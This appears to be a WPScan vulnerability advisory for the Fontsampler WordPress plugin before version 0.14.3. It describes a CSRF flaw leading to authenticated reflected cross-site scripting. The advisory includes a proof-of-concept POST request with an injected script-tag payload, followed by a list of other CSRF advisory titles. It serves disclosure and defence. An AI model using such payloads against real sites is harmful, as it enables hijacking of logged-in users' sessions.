Fontsampler < 0.14.3 – CSRF to Authenticated Reflected Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

The plugin did not properly check for CSRF and authorisation in its ajax_get_mock_fontsampler AJAX action, which could lead to an authenticated reflected XSS issue as user input was then output without being sanitised first.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 80
Connection: close
Cookie: [CSRF via any authenticated user]

action=get_mock_fontsampler&data[ui_columns]=TEST"><script>alert(/XSS/)</script>

Affects Plugins

Fixed in 0.14.3

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

c1e4aaff-e68d-4bb3-9f82-31c3a649b41b

Timeline

Publicly Published

2021-06-30 (about 4 years ago)

Added

2021-06-30 (about 4 years ago)

Last Updated

2021-06-30 (about 4 years ago)

Other

Published

Title

Published

2026-02-05

Title

Code Snippets < 3.9.5 - Cloud Snippet Download/Update Actions via CSRF

Published

2023-12-26

Title

Customize My Account for WooCommerce < 1.8.4 - Cross-Site Request Forgery via restore_my_account_tabs

Published

2024-01-19

Title

Splashscreen <= 0.20 - Settings Update via CSRF

Published

2025-05-14

Title

File Provider <= 1.2.3 - Item Deletion via CSRF

Published

2023-09-29

Title

WP Hide Pages <= 1.0 - Settings Update via CSRF